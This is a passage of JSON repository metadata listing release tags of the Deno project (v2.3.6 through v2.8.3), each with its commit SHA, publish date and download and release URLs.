3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/t